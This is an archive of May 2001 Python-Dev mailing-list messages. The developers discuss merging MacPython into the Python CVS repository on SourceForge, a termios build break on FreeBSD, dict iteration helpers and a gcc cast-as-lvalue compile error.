From loewis at informatik.hu-berlin.de  Mon May  7 11:53:54 2001
From: loewis at informatik.hu-berlin.de (Martin von Loewis)
Date: Mon, 7 May 2001 11:53:54 +0200 (MEST)
Subject: [Python-Dev] Moving MacPython to sourceforge
Message-ID: <200105070953.LAA14803@pandora.informatik.hu-berlin.de>

> There's two ways I can go about this: start a new MacPython project
> or merge the MacPython stuff into the main Python CVS repository.

There is actually a third option: Use the Python SF project, but
create a new module in the Python CVS repository (so no merging would
be done).

I don't know how much code this is. I'd favour merging the Mac code
into the core distribution. If there are loads of Mac-specific modules
that not every MacPython user needs, it might be advisable to create a
distutils package that contains the extra modules. Such a package
should still live in cvs.python.sourceforge.net:/cvsroot/python.

Just my 0.02EUR,

Martin


From guido at digicool.com  Mon May  7 16:00:08 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 07 May 2001 09:00:08 -0500
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: Your message of "Mon, 07 May 2001 11:53:54 +0200."
             <200105070953.LAA14803@pandora.informatik.hu-berlin.de> 
References: <200105070953.LAA14803@pandora.informatik.hu-berlin.de> 
Message-ID: <200105071400.JAA25627@cj20424-a.reston1.va.home.com>

[Jack]
> > There's two ways I can go about this: start a new MacPython project
> > or merge the MacPython stuff into the main Python CVS repository.

We have platform-specific subdirectories for so many projects that
it's a shame we don't have the Mac code in there as well!

The only (small) advantage I can imagine of a separate MacPython
project would be that you (Jack) can more easily give others commit
permission to the Mac tree without giving them commit permission to
all of Python (which requires they gain the trust of a larger group of
Python developers).  Of course, I don't know if you expect much help
from others who are not already Python developers.

[Martin]
> There is actually a third option: Use the Python SF project, but
> create a new module in the Python CVS repository (so no merging would
> be done).

I don't know much about modules, but would this allow Jack to check
out the main code and the MacPython code into a single work directory
(which he needs)?  If so, it may be the best solution.

Note that no matter how you do it, you'll have to submit a tree of RCS
files to the SF sysadmins to load, unless you want to lose years of
MacPython cvs logs...

> I don't know how much code this is. I'd favour merging the Mac code
> into the core distribution. If there are loads of Mac-specific modules
> that not every MacPython user needs, it might be advisable to create a
> distutils package that contains the extra modules. Such a package
> should still live in cvs.python.sourceforge.net:/cvsroot/python.

Undecidedly yours,

(Jack, regarding your Makefile and setup.py changes: I'd wait for
opinions on your patches from Neil and Andrew.  I don't see why
they would have an objection to adding these features, but the
specific implementation you propose might be subject to comments.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Mon May  7 15:04:15 2001
From: skip at pobox.com (skip at pobox.com)
Date: Mon, 7 May 2001 08:04:15 -0500
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl>
References: <20010507093944.1A340312BA0@snelboot.oratrix.nl>
Message-ID: <15094.40271.461338.638822@beluga.mojam.com>

    Jack> ... I'd like to move MacPython to sourceforge. There's two ways I
    Jack> can go about this: start a new MacPython project or merge the
    Jack> MacPython stuff into the main Python CVS repository.

I say merge.  

Skip


From nas at python.ca  Mon May  7 15:14:52 2001
From: nas at python.ca (Neil Schemenauer)
Date: Mon, 7 May 2001 06:14:52 -0700
Subject: [Python-Dev] Added a machine-dependent file to the core
In-Reply-To: <20010507094600.217CE312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:45:59AM +0200
References: <20010507094600.217CE312BA0@snelboot.oratrix.nl>
Message-ID: <20010507061452.A23494@glacier.fnational.com>

Jack Jansen wrote:
> To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup 
> of Python does not allow for an easy addition of a platform-dependent 
> sourcefile to the core interpreter (or am I missing something?).

No, its still a big ugly hack. :-)

> This is a bit of functionality I need to port the various Mac
> modules to MacOSX-python. The platform depende sourcefile has
> various glue routines for turning MacOS error codes into
> exceptions and that sort of stuff.
> 
> Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS?

How would this work?  Would MACHDEP_OBJS be set by an autoconf
subsitution?

  Neil


From jack at oratrix.nl  Mon May  7 15:17:18 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 15:17:18 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge 
In-Reply-To: Message by Guido van Rossum <guido@digicool.com> ,
	     Mon, 07 May 2001 09:00:08 -0500 , <200105071400.JAA25627@cj20424-a.reston1.va.home.com> 
Message-ID: <20010507131718.C22B7312BA1@snelboot.oratrix.nl>

> We have platform-specific subdirectories for so many projects that
> it's a shame we don't have the Mac code in there as well!

Great! I'll pack up my repository and send it to the 
sourceforge-powers-that-be shortly. The write permission for other MacPython 
developers shouldn't be a problem, I think Just is currently the only person 
with write permission (but I have to check).


> (Jack, regarding your Makefile and setup.py changes: I'd wait for
> opinions on your patches from Neil and Andrew.  I don't see why
> they would have an objection to adding these features, but the
> specific implementation you propose might be subject to comments.)

Definitely. I'll put them up as patches and then see what happens.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From jack at oratrix.nl  Mon May  7 15:27:14 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 15:27:14 +0200
Subject: [Python-Dev] Added a machine-dependent file to the core 
In-Reply-To: Message by Neil Schemenauer <nas@python.ca> ,
	     Mon, 7 May 2001 06:14:52 -0700 , <20010507061452.A23494@glacier.fnational.com> 
Message-ID: <20010507132714.B0808312BA1@snelboot.oratrix.nl>

> Jack Jansen wrote:
> > To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup 
> > of Python does not allow for an easy addition of a platform-dependent 
> > sourcefile to the core interpreter (or am I missing something?).
> [...]
> > 
> > Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS?
> 
> How would this work?  Would MACHDEP_OBJS be set by an autoconf
> subsitution?

Yes, that's what I had in mind (haven't written the code yet). Similar to the 
way DYNLOADFILE is set, but empty for all platforms except for OSX.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From nas at python.ca  Mon May  7 15:30:42 2001
From: nas at python.ca (Neil Schemenauer)
Date: Mon, 7 May 2001 06:30:42 -0700
Subject: [Python-Dev] Added a machine-dependent file to the core
In-Reply-To: <20010507132714.B0808312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:27:14PM +0200
References: <nas@python.ca> <20010507132714.B0808312BA1@snelboot.oratrix.nl>
Message-ID: <20010507063042.D23494@glacier.fnational.com>

Jack Jansen wrote:
> Yes, that's what I had in mind (haven't written the code yet). Similar to the 
> way DYNLOADFILE is set, but empty for all platforms except for OSX.

Sounds good to me.  Try to keep the code somewhat general so that
other platforms may use it.

  Neil


From mal at lemburg.com  Mon May  7 20:44:55 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 07 May 2001 20:44:55 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com>  
	            <3AF0662D.48671B4E@lemburg.com> <200105051145.GAA14831@cj20424-a.reston1.va.home.com>
Message-ID: <3AF6ED27.FB2C077B@lemburg.com>

Guido van Rossum wrote:
> 
> > I've attached the patch. Due to a small reorganisation the
> > patch is a little longer -- symmetry has its price at C level
> > too ;-)
> 
> Looks good on paper, so go ahead and check it in.  Watch out for
> potential changes caused by Tim's iter-crusade!  :-)

OK. I'll look into this later this week.
 
> While you're at it, why don't you check in the rot13 codec you posted
> -- it's good to have simle examples in the standard library.
> It would also be cool to have codecs for common file encodings like
> base64, quoted-printable, binhex, uuencode, and even hex
> (binascii.hexlify).

Right. I'll add these in the next few weeks -- as time comes
along.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From martin at loewis.home.cs.tu-berlin.de  Mon May  7 23:21:27 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 7 May 2001 23:21:27 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
Message-ID: <200105072121.f47LLRc01252@mira.informatik.hu-berlin.de>

> I don't know much about modules, but would this allow Jack to check
> out the main code and the MacPython code into a single work
> directory (which he needs)?

Using CVS modules allows to merge parts of the tree into a single
sandbox. E.g. you could do

macpython python/dist/src &Mac

'cvs co macpython' then would give you a dist/src directory, which
also contains a Mac directory (where Mac is another module, alongside
with /python, or a CVSROOT/modules entry).

You could use an exclude list, e.g.

macpython !PC !PCbuild !RISCOS python/dist/src &Mac

What you *cannot* do is to merge modules on a per-directory basis; all
files in a single directory must come from the same CVS module - you
can think of ampersand modules similar to Unix mount(1)ed file
systems.

Regards,
Martin


From tim.one at home.com  Tue May  8 06:14:22 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 8 May 2001 00:14:22 -0400
Subject: [Python-Dev] Help with SF bug 105470
Message-ID: <LNBBLJKPBEHFEDALKOLCGEMFKAAA.tim.one@home.com>

An ancient bug just got (re?)discovered on c.l.py, which I entered into SF:

http://sourceforge.net/tracker/?func=detail&aid=422177&group_id=5470&
    atid=105470

This has to do w/ gross loss of precision in manifest Python float constants,
if and only if a module is loaded from .pyc or .pyo format.  Since's it's
fp-related, and fp is tricky x-platform, I'd like some volunteers to test
this before I check it in.

Current CVS Python contains a dormant test case.  There's a patch attached to
the bug report that activates the test case, and tries to repair the problem.
After the patch, the fix works if and only if test_import doesn't fail,
neither after deleting all .pyc/.pyo files first, nor if run a second time
w/o deleting .pyc/.pyo.

Works on Win98SE, but you may have already guessed that <wink>.


From tim.one at home.com  Tue May  8 06:52:37 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 8 May 2001 00:52:37 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: <E14wyrU-0005qO-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>

[Jeremy Hylton, on python-checkins]
> ...
> XXX When should nested scopes by made non-optional on the trunk?

Since the trunk is 2.2a0, as soon as it's convenient.  Like, say, if you're
have trouble sleeping tonight <wink>.


From thomas at xs4all.net  Tue May  8 12:14:20 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 12:14:20 +0200
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <15090.64389.746625.331215@anthem.wooz.org>; from barry@digicool.com on Fri, May 04, 2001 at 02:57:09PM -0400
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> <20010503131714.D21814@inetnebr.com> <15090.64389.746625.331215@anthem.wooz.org>
Message-ID: <20010508121420.Y16486@xs4all.nl>

On Fri, May 04, 2001 at 02:57:09PM -0400, Barry A. Warsaw wrote:

> >>>>> "JE" == Jeff Epler <jepler at inetnebr.com> writes:

>     | Why not let us spell this as:
>     | 	class X(Y):
>     | 		from Y import foo as _sfoo, bar as _sbar
>     | 		...

>     NS> This already has a meaning in Python.  Paul's suggested syntax
>     NS> is pretty neat, IMHO.

> Not if Y is a class though, right?  That would currently raise an
> ImportError, ...

Nope:

>>> class string:
...     pass
... 
>>> from string import split
>>> string
<class __main__.string at 8072e90>
>>> 

That could be considered a misfeature for more than one reason (like
importing from non-module objects, which you now do by inserting the object
into sys.modules) but can't be fixed without breaking backward
compatibility, except by inventing new syntax.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From Mark.Favas at per.dem.csiro.au  Tue May  8 12:34:37 2001
From: Mark.Favas at per.dem.csiro.au (Favas, Mark (EM, Floreat))
Date: Tue, 8 May 2001 18:34:37 +0800 
Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD
Message-ID: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU>

A change to termios.c in the last couple of days to #include termio.h as
well as termios.h breaks the build on FreeBSD, which has only termios.h -
needs an autoconf test? There'll probably be other similar systems.

Cheers, Mark 


From thomas at xs4all.net  Tue May  8 13:36:38 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 13:36:38 +0200
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEIIKAAA.tim.one@home.com>; from tim.one@home.com on Sun, May 06, 2001 at 02:15:57PM -0400
References: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> <LNBBLJKPBEHFEDALKOLCKEIIKAAA.tim.one@home.com>
Message-ID: <20010508133638.Z16486@xs4all.nl>

On Sun, May 06, 2001 at 02:15:57PM -0400, Tim Peters wrote:

> Given the new dict iterators in 2.2, there's an easier fast way that doesn't
> mutate the dict even under the covers:

> def arb(dict):
>     if dict:
>         return dict.iteritems().next()
>     raise KeyError("arb passed an empty dict")

You probably want:

arb = dict.iteritems().next

so that you don't keep on returning the same key,value pair.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From thomas at xs4all.net  Tue May  8 14:10:00 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 14:10:00 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:39:43AM +0200
References: <20010507093944.1A340312BA0@snelboot.oratrix.nl>
Message-ID: <20010508141000.A16486@xs4all.nl>

On Mon, May 07, 2001 at 11:39:43AM +0200, Jack Jansen wrote:

> The Mac specific stuff for Python is all concentrated in a single subtree Mac 
> of the main Python tree (the subtree has its own hierarchy of 
> Python/Modules/Lib/etc directories), so putting it in the main repository 
> should not pollute the filenamespace all that much. It would also have the 
> advantage that a single "cvs update" would update everything (whereas the 
> current situation for Mac developers, where Python/Mac is from a different 
> CVSROOT than Python, does not have that advantage). The downside is that 
> everyone who does a full checkout of the tree would get an extra 1000 or so 
> files on their disk that are pretty useless unless they have a mac.

I'd say merge, except that the number '1000' is very large. Is it really
1000 ? The current Python tree contains only 304 .c and .h files, about 1000
.py files spread out over the tree (567 of which in Lib, the rest in
Demo/Tools) and obviously some misc files and CVS stuff, for a total of
around 2500 files. Is that 1000 a real number ? No temp files,
auto-generated files, .o files etc ? How large are they ? (the average size
in the current CVS tree is about 10k)

I'd probably still say 'merge', I'm just curious where the large number of
files comes from. Is it to keep the changes to the original files minimal ?
Given the number of platform-dependant #ifdefs and differently-defined
macro's we're using now, I don't see why some of those changes couldn't be
moved into the original files, if that's the case.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From thomas at xs4all.net  Tue May  8 14:13:39 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 14:13:39 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010507131718.C22B7312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:17:18PM +0200
References: <guido@digicool.com> <20010507131718.C22B7312BA1@snelboot.oratrix.nl>
Message-ID: <20010508141339.B16486@xs4all.nl>

On Mon, May 07, 2001 at 03:17:18PM +0200, Jack Jansen wrote:

> > We have platform-specific subdirectories for so many projects that
> > it's a shame we don't have the Mac code in there as well!

> Great! I'll pack up my repository and send it to the 
> sourceforge-powers-that-be shortly. The write permission for other MacPython 
> developers shouldn't be a problem, I think Just is currently the only person 
> with write permission (but I have to check).

That doesn't mean there isn't a problem. Just doesn't have write access :)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From guido at digicool.com  Tue May  8 15:35:50 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 08 May 2001 08:35:50 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: Your message of "Tue, 08 May 2001 00:52:37 -0400."
             <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com> 
Message-ID: <200105081335.IAA28415@cj20424-a.reston1.va.home.com>

> [Jeremy Hylton, on python-checkins]
> > ...
> > XXX When should nested scopes by made non-optional on the trunk?

[Tim]
> Since the trunk is 2.2a0, as soon as it's convenient.  Like, say, if you're
> have trouble sleeping tonight <wink>.

+1.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Tue May  8 15:41:42 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 08 May 2001 08:41:42 -0500
Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD
In-Reply-To: Your message of "Tue, 08 May 2001 18:34:37 +0800."
             <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> 
References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> 
Message-ID: <200105081341.IAA28486@cj20424-a.reston1.va.home.com>

> A change to termios.c in the last couple of days to #include termio.h as
> well as termios.h breaks the build on FreeBSD, which has only termios.h -
> needs an autoconf test? There'll probably be other similar systems.

Frankly, I don't see the point of including termio.h at all -- it
seems to be a backwards compatibility file.

Mark, can you please enter this in the bug database and assign it to
whoever checked in the change? :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas at python.ca  Tue May  8 16:05:01 2001
From: nas at python.ca (Neil Schemenauer)
Date: Tue, 8 May 2001 07:05:01 -0700
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>; from tim.one@home.com on Tue, May 08, 2001 at 12:52:37AM -0400
References: <E14wyrU-0005qO-00@usw-pr-cvs1.sourceforge.net> <LNBBLJKPBEHFEDALKOLCMEMJKAAA.tim.one@home.com>
Message-ID: <20010508070501.A25794@glacier.fnational.com>

Tim Peters wrote:
> [Jeremy Hylton, on python-checkins]
> > ...
> > XXX When should nested scopes by made non-optional on the trunk?
> 
> Since the trunk is 2.2a0, as soon as it's convenient.  Like, say, if you're
> have trouble sleeping tonight <wink>.

Shouldn't the entry in the __future__ file be:

    nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0))

or am I misunderstanding something?

  Neil


From jack at oratrix.nl  Tue May  8 16:07:39 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Tue, 08 May 2001 16:07:39 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge 
In-Reply-To: Message by Thomas Wouters <thomas@xs4all.net> ,
	     Tue, 8 May 2001 14:10:00 +0200 , <20010508141000.A16486@xs4all.nl> 
Message-ID: <20010508140741.790E5379B72@snelboot.oratrix.nl>

> I'd say merge, except that the number '1000' is very large. Is it really
> 1000 ? The current Python tree contains only 304 .c and .h files, about 1000
> .py files spread out over the tree (567 of which in Lib, the rest in
> Demo/Tools) and obviously some misc files and CVS stuff, for a total of
> around 2500 files. Is that 1000 a real number ? No temp files,
> auto-generated files, .o files etc ? How large are they ? (the average size
> in the current CVS tree is about 10k)

It's actually 830 files. This is 320 .py files (130 in Lib, the rest in 
Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build 
system), 30 resource files and then assorted things (html documentation, 
scripts to drive the distribution builder, etc).

The .xml and .exp files and about 20 of the .c files are machine generated, so 
they could technically be left out of the repository. The generation process 
of these files is a bit painful, though, so I've added them as a convenience 
(the reasoning is a bit along the lines of the Grammar stuff of the core).

The one thing that I should do is clean out the "Unsupported" directory before 
doing the merge. It contains some stuff that is long dead. But then, it isn't 
all that many files.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From mwh at python.net  Tue May  8 16:41:45 2001
From: mwh at python.net (Michael Hudson)
Date: Tue, 8 May 2001 15:41:45 +0100 (BST)
Subject: [Python-Dev] Recent change to termios module breaks build on
 FreeBSD
Message-ID: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain>

Guido van Rossum <guido at digicool.com> writes:

> > A change to termios.c in the last couple of days to #include termio.h
> > as well as termios.h breaks the build on FreeBSD, which has only
> > termios.h - needs an autoconf test? There'll probably be other similar
> > systems.
>
> Frankly, I don't see the point of including termio.h at all -- it
> seems to be a backwards compatibility file.

If you don't include termio.h the build breaks on alpha/OSF1.  This
sounds to me like OSF1's headers are broken (you can't include
sys/ioctl.h without including termio.h first, it seems, or you get
complaints about struct termio being undefined).  So I'd suggest

+#ifdef __osf__
 #include <termio.h>
+#endif

and then see if the build breaks anywhere else (I love unix).

Using the sf compile farm, I've tested this on FreeBSD, Linux/x86,
Linux/PPC, OSF1/alpha, Linux/sparc, Solaris/sparc (using gcc; cc gives
a pile of warnings from redefined macros and then dies 'cause it can't
find a valiud license file).

So we might need some more magic for solaris using cc.

Cheers,
M.

-- 
  Imagine if every Thursday your shoes exploded if you tied them
  the usual way.  This happens to us all the time with computers,
  and nobody thinks of complaining.                     -- Jeff Raskin


From fdrake at acm.org  Tue May  8 16:45:18 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Tue, 8 May 2001 10:45:18 -0400 (EDT)
Subject: [Python-Dev] Recent change to termios module breaks build on
 FreeBSD
In-Reply-To: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain>
References: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain>
Message-ID: <15096.1662.137269.996490@cj42289-a.reston1.va.home.com>

Michael Hudson writes:
 > If you don't include termio.h the build breaks on alpha/OSF1.  This
 > sounds to me like OSF1's headers are broken (you can't include
 > sys/ioctl.h without including termio.h first, it seems, or you get
 > complaints about struct termio being undefined).  So I'd suggest
 > 
 > +#ifdef __osf__
 >  #include <termio.h>
 > +#endif
 > 
 > and then see if the build breaks anywhere else (I love unix).

  Does it make more sense to do this or to test for termio.h in
configure?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From m.favas at per.dem.csiro.au  Tue May  8 16:47:39 2001
From: m.favas at per.dem.csiro.au (Mark Favas)
Date: Tue, 08 May 2001 22:47:39 +0800
Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD
References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> <200105081341.IAA28486@cj20424-a.reston1.va.home.com>
Message-ID: <3AF8070B.87D3C5B2@per.dem.csiro.au>

Guido van Rossum wrote:
> 
> > A change to termios.c in the last couple of days to #include termio.h as
> > well as termios.h breaks the build on FreeBSD, which has only termios.h -
> > needs an autoconf test? There'll probably be other similar systems.
> 
> Frankly, I don't see the point of including termio.h at all -- it
> seems to be a backwards compatibility file.
> 
> Mark, can you please enter this in the bug database and assign it to
> whoever checked in the change? :-)

Done - Michael Hudson wrote the patch, so I've assigned the bug to Fred
Drake <grin>

-- 
Mark Favas  -   m.favas at per.dem.csiro.au
CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA


From thomas at xs4all.net  Tue May  8 17:52:49 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 17:52:49 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl>; from jack@oratrix.nl on Tue, May 08, 2001 at 04:07:39PM +0200
References: <thomas@xs4all.net> <20010508140741.790E5379B72@snelboot.oratrix.nl>
Message-ID: <20010508175248.E16486@xs4all.nl>

On Tue, May 08, 2001 at 04:07:39PM +0200, Jack Jansen wrote:

[ Jack wants to add the +/- 1000 extra files from the MacPython source tree
  to the Python CVS repository ]

> It's actually 830 files. This is 320 .py files (130 in Lib, the rest in 
> Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build 
> system), 30 resource files and then assorted things (html documentation, 
> scripts to drive the distribution builder, etc).

I'd say merge it. If there had been decent CVS clients for the mac when you
started, those files would have been in the CVS tree already. 

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From skip at pobox.com  Tue May  8 20:22:17 2001
From: skip at pobox.com (skip at pobox.com)
Date: Tue, 8 May 2001 13:22:17 -0500
Subject: [Python-Dev] Moving MacPython to sourceforge 
In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl>
References: <thomas@xs4all.net>
	<20010508141000.A16486@xs4all.nl>
	<20010508140741.790E5379B72@snelboot.oratrix.nl>
Message-ID: <15096.14681.773554.729550@beluga.mojam.com>

    Jack> It's actually 830 files. ... 120 .c/.h files ...

How many of those 120 files are variants of existing source files that (in
theory) could be merged with their mainline counterparts?

Skip


From mwh at python.net  Wed May  9 00:27:59 2001
From: mwh at python.net (Michael Hudson)
Date: 08 May 2001 23:27:59 +0100
Subject: [Python-Dev] Recent change to termios module breaks build on  FreeBSD
In-Reply-To: "Fred L. Drake, Jr."'s message of "Tue, 8 May 2001 10:45:18 -0400 (EDT)"
References: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain> <15096.1662.137269.996490@cj42289-a.reston1.va.home.com>
Message-ID: <m3pudjscgg.fsf@atrus.jesus.cam.ac.uk>

"Fred L. Drake, Jr." <fdrake at acm.org> writes:

> Michael Hudson writes:
>  > If you don't include termio.h the build breaks on alpha/OSF1.  This
>  > sounds to me like OSF1's headers are broken (you can't include
>  > sys/ioctl.h without including termio.h first, it seems, or you get
>  > complaints about struct termio being undefined).  So I'd suggest
>  > 
>  > +#ifdef __osf__
>  >  #include <termio.h>
>  > +#endif
>  > 
>  > and then see if the build breaks anywhere else (I love unix).
> 
>   Does it make more sense to do this or to test for termio.h in
> configure?

If you're asking *me*, I have no idea.  I'd hope that no system would
be as broken as osf1 is in this regard, but then I'd have hoped that
osf1 wasn't this broken too...

I guess the test in configure is "safer" in some sense.  Getting this
perfectly right would probably require more autoconf hackery than one
can possibly imagine... ncurses generates an amk script from
./configure that is then run to produce term.h, but I'm not sure that
all of that is devoted to including the right headers.

can-we-just-have-TERMIOS-back?-ly y'rs
M.

-- 
  Good? Bad? Strap him into the IETF-approved witch-dunking
  apparatus immediately!                        -- NTK now, 21/07/2000


From tim.one at home.com  Wed May  9 08:48:12 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 02:48:12 -0400
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <20010508133638.Z16486@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEAAKBAA.tim.one@home.com>

[Tim]
> Given the new dict iterators in 2.2, there's an easier fast way
> that doesn't mutate the dict even under the covers:
>
> def arb(dict):
>     if dict:
>         return dict.iteritems().next()
>     raise KeyError("arb passed an empty dict")

[Thomas Wouters]
> You probably want:
>
> arb = dict.iteritems().next
>
> so that you don't keep on returning the same key,value pair.

No, I would not want that.  If "arbitrary" suffices, then by defn. *any*
element is "good enough".  If it's not good enough to get the same one back
every time, then I want a stronger guarantee about what arb() returns than
the inexplicable behavior of repeated calls to dict.iteritems().next in the
presence of dict mutation.  But as I've said several times before <wink>, I'm
still asking for an algorithm where arb() is actually useful (as opposed to
.popitem(), which is dead easy to explain in the presence of mutation; your
version of arb() can, e.g., return a given entry more than once, may skip
entries, and may raise StopIteration with unexamined entries remaining in the
dict).

not-inclined-to-accept-shallow-comfort-at-the-cost-of-deep-confusion-ly
    y'rs  - tim


From tim.one at home.com  Wed May  9 09:42:00 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 03:42:00 -0400
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <200105090552.NAA08038@erebus.per.dem.csiro.au>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEADKBAA.tim.one@home.com>

[Mark Favas]
> Changes in the last few hours (hi Tim!)

Hi Mark!  Sorry about that!

> to stringobject compile (I'd guess) on MS

You guess right -- and under two flavors of Windows <wink>.

> (and on Compaq's Tru64 compiler),

Figures.

> but produce the following with gcc on Solaris and FreeBSD:
>
> gcc -c -g -O2 -Wall -Wstrict-prototypes -I. -I./Include
> -DHAVE_CONFIG_H  -o Objects/stringobject.o Objects/stringobject.c
> Objects/stringobject.c: In function `PyString_FromStringAndSize':
> Objects/stringobject.c:76: invalid lvalue in unary `&'
> Objects/stringobject.c:80: invalid lvalue in unary `&'
> Objects/stringobject.c: In function `PyString_FromString':
> Objects/stringobject.c:130: invalid lvalue in unary `&'
> Objects/stringobject.c:134: invalid lvalue in unary `&'
> *** Error code 1

Fair enough:  I tried to use a cast as an lvalue in those 4 places, all of
the form:

    		PyString_InternInPlace(&(PyObject *)op);

where op is declared PyStringObject*.  Strictly speaking, that ain't legal,
but changing it to:

		PyObject *t = (PyObject *)op;
    		PyString_InternInPlace(&t);

is.  You may wonder WTF the difference is.  That's easy:  the rewrite doesn't
use a cast expression as an lvalue <wink>.

sensible-or-not-it's-checked-in-so-please-try-again-ly y'rs  - tim


From jack at oratrix.nl  Wed May  9 10:16:29 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Wed, 09 May 2001 10:16:29 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge 
